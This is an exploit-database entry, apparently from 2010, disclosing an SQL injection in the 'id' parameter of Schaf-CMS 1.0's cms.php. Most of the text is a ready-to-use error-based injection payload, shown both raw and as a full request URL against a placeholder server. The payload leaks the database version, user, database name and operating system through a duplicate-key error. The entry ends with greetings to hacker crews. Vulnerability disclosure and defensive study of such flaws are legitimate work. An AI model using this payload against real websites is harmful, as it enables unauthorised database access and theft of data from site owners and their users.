Schaf-CMS 1.0 - SQL Injection



EKU-ID: 19869 CVE: OSVDB-ID:
Author: Manas58 Published: 2010-05-24 Verified: Verified
Download:

Rating

☆☆☆☆☆
Home 


Schaf-CMS 1.0 SQL Injection  Vulnerability

###########################

Author    : Manas58
Homepage  : http://www.1923turk.com
Script    : Schaf-CMS 1.0
Download  : http://www.brothersoft.com/site-builder-software---cms-53489.html

###########################

[ Vulnerable File ]

cms.php?id= [ SQL ]


[ XpL ]

+or+(select+count(*)+from+(select+1+union+select+2+union+select+3)x+group+by+concat(concat_ws(0x0b,version(),user(),database(),@@version_compile_os),floor(rand(0)*2)))--+


http://server/cms.php?id=5+or+(select+count(*)+from+(select+1+union+select+2+union+select+3)x+group+by+concat(concat_ws(0x0b,version(),user(),database(),@@version_compile_os),floor(rand(0)*2)))--+




##############################################################
# Greetz: Gamoscu - Baybora - Delibey - Tiamo - Psiko - Turco - infazci - X-TRO
##############################################################